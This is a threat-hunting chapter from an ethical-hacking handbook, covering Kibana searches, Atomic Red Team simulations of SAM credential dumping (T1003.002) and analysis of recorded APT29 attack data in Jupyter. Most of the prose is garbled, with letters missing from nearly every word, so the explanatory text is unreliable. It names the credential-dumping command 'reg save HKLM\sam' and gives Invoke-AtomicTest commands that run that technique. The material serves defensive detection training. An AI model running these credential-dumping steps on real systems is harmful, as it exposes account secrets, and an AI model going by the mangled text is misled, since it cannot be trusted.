      p://gub.com/dcaayco/aomc-d-am/blob/ma/aomc/T003.00/
      T003.00.md
   Scoll dow o  ow  AomcRdTam ool wll mula  aack, o you could
yp  commad maually. Do y look amla? Ty ould, bcau  a
 am commad w aw o  MITRE ATT&CK amwok pag.

   Now, om you admao commad-l pomp (o a Wdow 0 o), yp
 commad ow   pvou lluao o maually mula a aack.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Now, op you Kbaa daboad (om la cap). Nx, l’ add a colum o ou
              Kbaa ul l by dg #v_d   l-d pal’ ac box ad clckg
               Add buo.

                Fom ow o, you wll av v_d a a ad o  op o  ac ul l.
              R  pag o  .

                Nx, ac o  commad “reg save HKLM\sam”. No a you av o u
              quo o cap  backla. Eu you clck  calda ad  lc Today:
  You ould   ollowg ac ul:

                                                                                                                 PART II
   W   v ID   ac ul a 4,88 (dgad  comma). Rcall
om  OSSEM dagam ow al a   o o  xpcd v ID o
commad xcuo. T  a ky lag po: w oud  “v_d”  m
by acg o a vy pcc aack cqu. Gog owad, w wll wok  
o dco.
   By xpadg a log ad collg dow a b   log ul, w   acual
commad l  aack ypd , a xpcd:

  Obvouly,   a bac xampl  a cla  vom, bu do’ woy. Nx,
w wll amp  up.

Exploring Hypothesis-Driven Hunts
Now a w av  a daa-dv a u, l’ xplo a ypo-dv
a u.

Lab 9-3: Hypothesis that Someone Copied a SAM File

I  lab, w wll puu (u) bad o  ypo a omo copd a SAM
l w ou doma. To pd up  lag cycl, w wll u  auomad 
ucoaly o AomcRdTam ool, calld Ivok-AomcT, o u    a
co ma ad av u all  ypg volvd w  aack.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Fom a admav PowSll wdow o  Wdow 0 o,  up 
              vom ug  ollowg commad (copy/pa om p://dcolab
              .wok/uag/aomcdam/).
              Import-Module "C:\Tools\AtomicRedTeam\invoke-atomicredteam\Invoke-
              AtomicRedTeam.psd1" -Force
              $PSDefaultParameterValues = @{"Invoke-AtomicTest:PathToAtomicsFolder"="C:\
              Tools\AtomicRedTeam\atomics"}

                 Nx, vok  , ug  a gl , mulpl , o  ull  quc
              o T003.00, a ow   ollowg cod. T -ShowDetailsBrief agum wll
              ow   aco, bu o pom m, o   a good da o do  .
              Invoke-AtomicTest T1003.002 -TestNumbers 1 -ShowDetailsBrief
              #or
              Invoke-AtomicTest T1003.002 -TestNumbers 1,2 -ShowDetailsBrief
              #or
              Invoke-AtomicTest T1003.002 -ShowDetailsBrief

                  T ollowg mag ow    quc o  la commad:

                 Ga! Now, lauc   commad ( ), wou -ShowDetailsBrief, o
              xcu  aack, a ow x:

                 Sc w alady kow  a  way  SAM l copy ca b dcd—
              commad, l, ad gy (  dagam ad abl a ollow   Lab 9-)—w
              ca u  omao o a ug. W call a  v ID o 488 ad 403
              a dcao o commad xcuo. Sc w alady lookd a 488, l’ ac 
m o 403. Op you Kbaa cool ad ac o “HKLM\sam” and event_
id:4103, ad you ould  om , a ow x:

                                                                                                                  PART II
  Tak a mom o amlaz youl w  log oupu;  pacula, look a 
Payload ld. Expad  log ad coll dow o  dal, a ow :

   Now you kow wa a PowSll payload look lk  log oma. I you y 
 you poduco wok, you would ac o  am log, bu wou 
da coa.

Crawl, Walk, Run
So a   cap, you av lad o cawl (maually) ad walk (w auomad
cp by AomcRdTam). You av  bac o a ug dow, bu oly o
o MITRE ATT&CK ub-cqu. I od o walk a, you av o pacc ow
w o cqu, wokg you way oug  MITRE ATT&CK amwok by
ug you av  coc daa ouc, mulag  aack, ad  lag ow
o dy   log. Icagly, ov m, you wll ga xpc ad mo mpo-
aly la mo abou ow Wdow log wok.6 Fo xa cd, puu  l ad
gy acc o T003.00, ow a  d o Lab 9-.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Tak a mom o wok oug a w mo xampl ug  AomcRdTam
              cp.7 W you a ady o a joggg, cou o   cap.

              Enter Mordor
              I  co, w wll u  Modo daa8 w alld   la cap ad
              a joggg a a u. I od o pck up  pac, w wll u  pcodd
              aack daa, capud   umm o 00 by Robo Rodguz,9 bad o 
              al wok om  MITRE Eguy ATT&CK Evaluao po.0 W wll load
               APT9 aack daa, pcodd by Rodguz, o mula  APT9 goup  ou
              wok om a daa ppcv. T  powul, a w ca b pad  m o 
              up ad xcu all o commad. To la mo abou  up ad  acual aack
              quc,   “Rc” co a  d o  cap.

              Lab 9-4: Hypothesis that Someone Other
              than an Admin Launched PowerShell

              I  lab, w wll  ou o pov  ypo a omo laucd PowSll,
              o a a adm. No a  may o may o b malcou, bu   a good plac
              o a. Dpdg o  z o you wok, you may av a lo o PowSll bg
              ud, bu you ould b abl o ola you admao u ad  dc o
              wo a ug PowSll. By  way,   a good  p, bu ulmaly you wll
              wa o moo ad vga all you adm acv a wll. A all,  o o m
               compomd,  aack would lov o lvag  pvlg w  wok.
                  I od o g a da o all  way PowSll may b laucd, w u o ou
              OSSEM Jupy obook om Lab 9-. You may d o a    a md ou—
                 a all! Cckg  MITRE ATT&CK amwok, w  a T059.00 
               cqu o laucg PowSll locally:

                 L’ look a  OSSEM dagam o a cqu, a ow x. G   ab
              o dog .
H, w  val pa o dcg PowSll xcuo, oug cp, 
commad l, ad poc cao. Sc w loadd  Modo daa   la cap,
l’ ca a dx. Clck  K co   upp-l co o you Kbaa poal
o go o  om pag;  coll dow ad clck Idx Pa ud Maag ad
Adm  Elac Sack:

                                                                                                                  PART II
  Nx, clck  blu Ca Idx Pa buo a  op o  c:

  Typ logs-indexme-2020.05.02*   Idx Pa ld ad  clck 
Nx Sp buo:

   Fo Tm Fl Fld Nam, lc @mamp ad clck  Ca Idx
Pa buo:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Now a  dx  cad, you may lc  o  l d o  Kbaa pal.
              T, ac o “powershell.exe” w a l o EventID: 1 ad a da ag, a
              ow x:

                 Now a w av all  powll.x log w ou vom, w ca l
              o a pacula dxd ld valu; o xampl, w could op (xpad) a log ad coll
              dow o LogoID (0x3733). LogoID ma ady ougou  o o 
              u ad  uul  ackg  o acv. So, l’ ov ov  magyg
              gla (w plu g), a ow x, ad  lc Fl Fo Valu.

                 T wll add  l o LogoId: 0x3733, owg u   o  log. Nx,
              ac o “cmd.exe”, a ow x, o look o commad-l acvy:

                  W  v . Scollg dow oug  log, w  a clu:  PaImag
              ld ( l a wa ud o ca  cu poc) a a odd am. Look lk a
              cav l.
   Now, acg o a lam, w  w av v . Scollg oug o
log, w  ou u: DMEVALS\pbly.

                                                                                                                 PART II
   Now w kow  u, ad   o adm. S ould o b ug PowSll,
o l’ kp lookg. Addg  uam o  quy, a ollow, w d wok
coco   log:

   Wa av w lad? Rv gg  aack o a, w av lad a 
aack a do  ollowg:
   1. T u DMEVALS\pbly xcud “C:\ProgramData\victim\â€®cod.3aka3
      .scr”.
   2. Ta l opd a wok coco.
   3. Ta l  opd cmd.x.
   4. Cmd.x opd PowSll.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 A you av , w ad w a ypo, bu   poc, w ladd  
              mddl o  MITRE ATT&CK amwok,   xcuo pa. T w wokd
              backwad o d  ouc o  acvy ad  u ad mac. Now,   lkly
              m o coac  cd po am ad wok w m o dm  x
              o  aack, a w oly av  bgg a  po—a la ul w g o 
              x lab!

              Threat Hunter Playbook
              So a, you av lad o cawl, walk, ad  u (wll, pap jog)  a u-
              g. Now l’ la ow o p by ug  Ta Hu Playbook by, you gud
              ,  Rodguz bo.

              Departure from HELK for Now
              Up o  po, w av b abl o u  DcoLab vom, augmd
              w HELK o () pacc dg olad aack w AomcRdTam cp ad
              () u  Modo daa om Cap 8 o pacc o mo compv aack
              daa. Now w av acd  lm o ou DcoLab vom. T ao 
              o o qud ouc. You may call back  Cap 8 a w lcd 4 w
              allg HELK. Ta p alld  ollowg m:
              2. KAFKA + KSQL + ELK + NGINX + ELASTALERT

                 Ta lco () qud 5GB o RAM, ad a  all w ad l a allg
                o DcoLab o  pcbd ym qum o GB RAM. Now, 
              you av mo a GB o RAM avalabl o alld   cloud (lcg a lag
              ym, uc a Sadad_D3_v),  you may lc  x lvl o 3:
              3. KAFKA + KSQL + ELK + NGINX + SPARK + JUPYTER

                 A dcad,  vo a Spak ad Jupy, wc a qud o go u 
               cap. Now, wa  you do o av o ym qum ad do o wa
               xa xp o a lag cloud ac? W av you covd, o do’ woy. T
               o  cap ak advaag o a povo o  Rodguz bo, Ta
              Hu Playbook, compl w a wb-bad um vom o you o cou
              lag.

              Spark and Jupyter
              T a val ao wy Spak ad Jupy a qud o advac ou lag. A
              good a Elacac ,   o a laoal daaba, o  u ou a jo a com-
              puaoally xpv., 3 A join  a uco commo o SQL a allow u o com-
              b daa, a pa o a quy, o b mo agd  ou vgao. Fo xampl,  w
              ad wo daa ouc, o w ac_p ad u_am ad  o w ac_p ad
              o_am, w could join m   ollowg way.
  A l jo, u cod om  l ouc, w mac om  g ouc:
 Data Source 1             Operation    Data Source 2                Result
 static_ip     user_name                static_ip host_name           static_ip     user_name   static_ip      host_name
 192.168.1.25   pbeesly                 192.168.1   scranton01       192.168.1.25   pbeesly     192.168.1.25   scranton04
                           Left Join                             =
 192.168.2.23   bsimpson                192.168.1   scranton04       192.168.2.23
 192.168.1.2    ckent                   192.168.1   philly01         192.168.1.2    ckent       192.168.1.2    scranton01

  A  jo u oly cod w macg valu  bo l ad g ouc:

                                                                                                                                              PART II
 Data Source 1             Operation    Data Source 2                Result
 static_ip     user_name                static_ip host_name           static_ip     user_name   static_ip      user_name
 192.168.1.25   pbeesly                 192.168.1   scranton01       192.168.1.25   pbeesly     192.168.1.25   scranton04
                           Inner Join                            =
 192.168.2.23   bsimpson                192.168.1   scranton04       192.168.1.2    ckent       192.168.1.2    scranton01
 192.168.1.2    ckent                   192.168.1   philly01

  A ull ou jo u cod w   a mac om  ouc:
 Data Source 1             Operation    Data Source 2                Result
 static_ip     user_name                static_ip host_name           static_ip     user_name   static_ip      user_name
 192.168.1.25   pbeesly                 192.168.1   scranton01       192.168.1.25   pbeesly     192.168.1.25   scranton04
                           Full Outer                            =
 192.168.2.23   bsimpson      Join      192.168.1   scranton04       192.168.2.23   bsimpson
 192.168.1.2    ckent                   192.168.1   philly01         192.168.1.2    ckent       192.168.1.2    scranton01
                                                                     192.168.1.5                192.168.1.5    philly01

    T jo ca b pomd w Apac Spak, ug daa om Elacac, wc
 paculaly uul w a ug, allowg u o ac o c ou daa by
combg val daa ouc.4 W wll   play ou   x lab.

Lab 9-5: Automated Playbooks and Sharing of Analytics

                  NOTE Before we get started with this lab, please understand that we are
                  going to switch learning environments in order to advance our knowledge
                  and capability. Now, in the future, you may switch back to the built-in
                  playbooks, but again, you will need more system resources, as explained
                  previously.

   I od o a aalyc ad povd a mo obu ag vom, 
Rodguz bo dvlopd a  o Jupy obook od o  Bdub
plaom.5, 
   F, v p://auplaybook.com/oduco.ml.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 O  l d o  c, clck  F Tlmy Nobook lk. T wll load
               Jupy obook pag a a  Modo daa ad all  aalyc ady o you
              o la.

                  T, clck  ock co a  op o  c ad lauc  Bd lk.

                 T Jupy obook may ak a w mu o lauc, bu b pa. W 
              load, clck    block o cod ad  clck  Ru buo a  op o p
              shift-enter o u a block o cod ad load  qud lba. Rmmb, om
              o  p   lbay wll ak a wl. You wll   -pog ymbol, [*], o
               l o  cod block ad a umb w  compl. B u o l o cod
              block compl bo movg o.

                 B u o ad  x a  dplayd abov ac cod block o udad ;
               kp clckg  Ru buo o pg shift-enter o xcu  ubqu
              cod block ul you g o  Dcomp Daa cod block. A o  wg o
               cap,   a o o  obook w pullg Modo daa, ad you
              av o cag  commad o  ollowg URL (com a blow bo ug
               block):
              !wget https://github.com/OTRF/Security-Datasets/raw/master/datasets/compound/
              apt29/day1/apt29_evals_day1_manual.zip
  Cou xcug  cod ad comm block ul you g o  ollowg p:

                                                                                                                 PART II
   T x block o cod you xcu  Spak SQL, wc lc cod om 
ap9Ho mp vw om  Symo/Opaoal cal, w EventID = 1,
ParentImage clud “%explorer.exe”, ad Image (lam) clud “%3aka3%”.
T omao pck up om ou pvou u, w w oud a Pam clckd a
cav w  am. L’  ow dp  abb ol go!

  T cod u a cod w a log y a ollow:

   T ould b amla ow. Kp gog, caully udyg ac p, lookg ov
 ould o Robo Rodguz, wo ppad  o you. You wll   wok
coco w oud pvouly; you wll alo  cmd.x laucd. I  g o
  poc   o dco. Rmmb w ad pvouly a you wll o
Gray Hat Hacking: The Ethical Hacker’s Handbook
              a   mddl o  MITRE ATT&CK amwok ad  wok l ad g o
              d  advay. You wll d  qu mpl, ul you g o “.B.. PowSll,”
              w w av ou  jo am.

                 Rmmb om al a a  jo u a jod cod w mac om
              bo daa ouc (  ca “a” ad “b”), wc a dd   op ad boom o
               INNER JOIN am. T ul a  cod, o o wc  ow 
              ( daa o wc w av  bo). Tak o  jo, w   u ID,  com-
              mad xcud,  pa commad l,  logo ID, a valu, ad mo, all 
              o vw.

                 You ca ow  a you ca wok maually w Elacac, o w  aac
              o Apac Spak SQL, o pom advacd jo opao. A a omwok agm,
              kp xcug  p   obook o la v mo. Happy ug!
Summary
I  cap, w ackld  opc o a ug. A ad a  bgg o 
cap, you a-ug kll wll d o b dvlopd ov ya o pacc, ad
 cap lpd abld  bac. W ad w a dcuo o daa ouc
ad ow o omalz  daa ug OSSEM. T w movd o o bac a-u-
g poc, cludg daa-dv ad ypo-dv u. W wokd oug
a  o lab, dgd o cac  uac o  kll qud ad o gv you a

                                                                                                                   PART II
amwok om wc o xpad you kowldg. Fally, w owd ow o xd
 kll  a al opaoal wok, byod you lab.

For Further Reading
Red Canary, Atomic Red Team gub.com/dcaayco/aomc-d-am
MITRE ATT&CK® Navigator m-aack.gub.o/aack-avgao/
Threat Hunting with MITRE ATT&CK® www.aug./00/05/4/a-
dco-w-m-ack-ad-aomc-dam/
SANS: Building and Growing your Threat Hunting Program www.a.og/mda/
aaly-pogam/buldg-maug-a-ug-pogam-3905.pd
Vala Coa-Gazcó. Practical Threat Intelligence and Data-Driven Threat Hunting:
A Hands-on Guide to Threat Hunting with the ATT&CKTM Framework and Open
Source Tools. Pack Publg, 0. www.amazo.com/Paccal-Ta-Hug/
dp/83855370
Threathunting.net www.aug./adg-l
“Hunt Evil: Your Practical Guide to Threat Hunting” www.aug./l/
u-vl-paccal-gud-a-ug.pd

References
   1. Haua, “Ta Hug Ug Symo – Advacd Log Aaly o
      Wdow,” Security Investigation, July 0, p://www.ocvgao.com/
      a-ug-ug-ymo-advacd-log-aaly-o-wdow/ (accd
      Augu 3, 0).
   2. Robo Rodguz, “Cagozg ad Ecg Scuy Ev  a ELK w
       Hlp o Symo ad ATT&CK,” Medium, July 08, p://po.pcop
      .o/cagozg-ad-cg-cuy-v--a-lk-w--lp-o-ymo-
      ad-a-ck-c83034d34 (accd Augu 30, 0).
   3. “OSSEM – T OSSEM Pojc.” p://ompojc.com/o.ml
      (accd Augu 30, 0).
Gray Hat Hacking: The Ethical Hacker’s Handbook
                   4. Jo Lu Rodguz, “Dg ATT&CK Daa Souc, Pa I: Eacg 
                      Cu Sa,” Medium, p://mdum.com/m-aack/dg-aack-daa-
                      ouc-pa--4c3958454 (accd Augu 3, 0).
                   5. “OS Cdal Dumpg: Scuy Accou Maag,” MITRE ATT&CK,
                      p://aack.m.og/cqu/T003/00/ (accd Augu 3, 0).
                   6. Robo Rodguz, “Wdow – Ta Hu Playbook.” p://
                      auplaybook.com/lbay/wdow/o.ml (accd Augu 3, 0).
                   7. Rd Caay, “Aomc Rd Tam,” GitHub. p://gub.com/dcaayco/
                      aomc-d-am (accd Augu 3, 0).
                   8. Robo Rodguz, “E Modo: P-codd Scuy Ev om Smulad
                      Advaal Tcqu,” p://po.pcop.o/-modo-p-codd-
                      cuy-v-om-mulad-advaal-cqu-d5555c9b (accd
                      Augu 3, 0).
                   9. Robo Rodguz, “Modo Lab – Pa : Dployg ATT&CK APT9 Eval
                      Evom va ARM Tmpla o Ca Dco Rac Oppou,”
                      Open Threat Research, Ju 00, p://mdum.com/a-u-og/
                      modo-lab-pa--dployg-a-ck-ap9-val-vom-va-am-
                      mpla-o-ca-cc4bc3c9a (accd Augu 3, 0).
                 10. C. T. Cop, “You Compl Ioducoy Gud o Udadg  MITRE
                     Eguy ATT&CK Evaluao Rul,” CyCraft, Ju 0, p://mdum
                     .com/cyca/you-compl-oducoy-gud-o-udadg--m-
                     guy-a-ck-valuao-ul-7b447743b88 (accd Augu 3, 0).
                 11. “Ioduco – Ta Hu Playbook.” p://auplaybook.com/
                     oduco.ml (accd Augu 07, 0).
                 12. Robo Rodguz, “Wlcom o HELK!: Eablg Advacd Aalyc
                     Capabl,” Medium, Apl 08. p://po.pcop.o/wlcom-o-lk-
                     ablg-advacd-aalyc-capabl-0805d0bb38 (accd Augu 3, 0).
                 13. Robo Rodguz, “Ta Hug w Jupy Nobook – Pa 3: Quyg
                     Elacac va Apac Spak,” Medium, Ju 09. p://po.pcop.o/
                     a-ug-w-jupy-obook-pa-3-quyg-lacac-va-apac-
                     pak-70054cd9d47 (accd Augu 3, 0).
                 14. Robo Rodguz, “Ta Hug w Jupy Nobook – Pa 4:
                     SQL JOIN va Apac SpakSQL,” Medium, May 09, p://po.pcop
                     .o/a-ug-w-jupy-obook-pa-4-ql-jo-va-apac-pakql-
                     3098c93 (accd Augu 3, 0).
                 15. “Wlcom o HELK!: Eablg Advacd Aalyc Capabl,” op. c.
                 16. Robo Rodguz, “Ta Hu Playbook + Modo Daa + BdHub
                     = Op Iaucu o Op Hu,” Open Threat Research, Dcmb 09,
                     p://mdum.com/a-u-og/a-u-playbook-modo-daa-
                     bdub-op-aucu-o-op-8c8a3d8b4 (accd Augu 3, 0).
